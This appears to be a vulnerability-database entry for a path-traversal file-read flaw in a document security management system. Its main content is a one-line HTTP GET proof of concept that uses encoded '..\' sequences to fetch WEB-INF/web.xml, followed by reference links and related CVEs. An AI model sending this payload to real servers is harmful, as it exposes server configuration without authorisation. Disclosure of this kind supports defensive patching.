PoC Copy GET /docsafe/sc/skins/..%5C..%5C..%5CWEB-INF%5Cweb.xml HTTP/1.1 # Visit https://trap.biu.life/ to view exploit trends for this vulnerability. Source: https://vip.vulbox.com/detail/1981271143599968256
References https://www.oscs1024.com/hd/MPS-61un-tzxm https://www.shangbon.com/news/4360.html https://github.com/eeeeeeeeee-code/POC/blob/main/wpoc/%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FV6.0%E6%8E%A5%E5%8F%A3backup%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md https://www.gm7.org/archives/32778
Related VulnerabilitiesPoCCVE-2021-25063: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site ScriptingWordPress Contact Form 7 Skins CVE-2021-25063跨站脚本漏洞XWiki 平台 SkinsCode.XWikiSkinsSheet文件存在命令执行(CVE-2023-37462)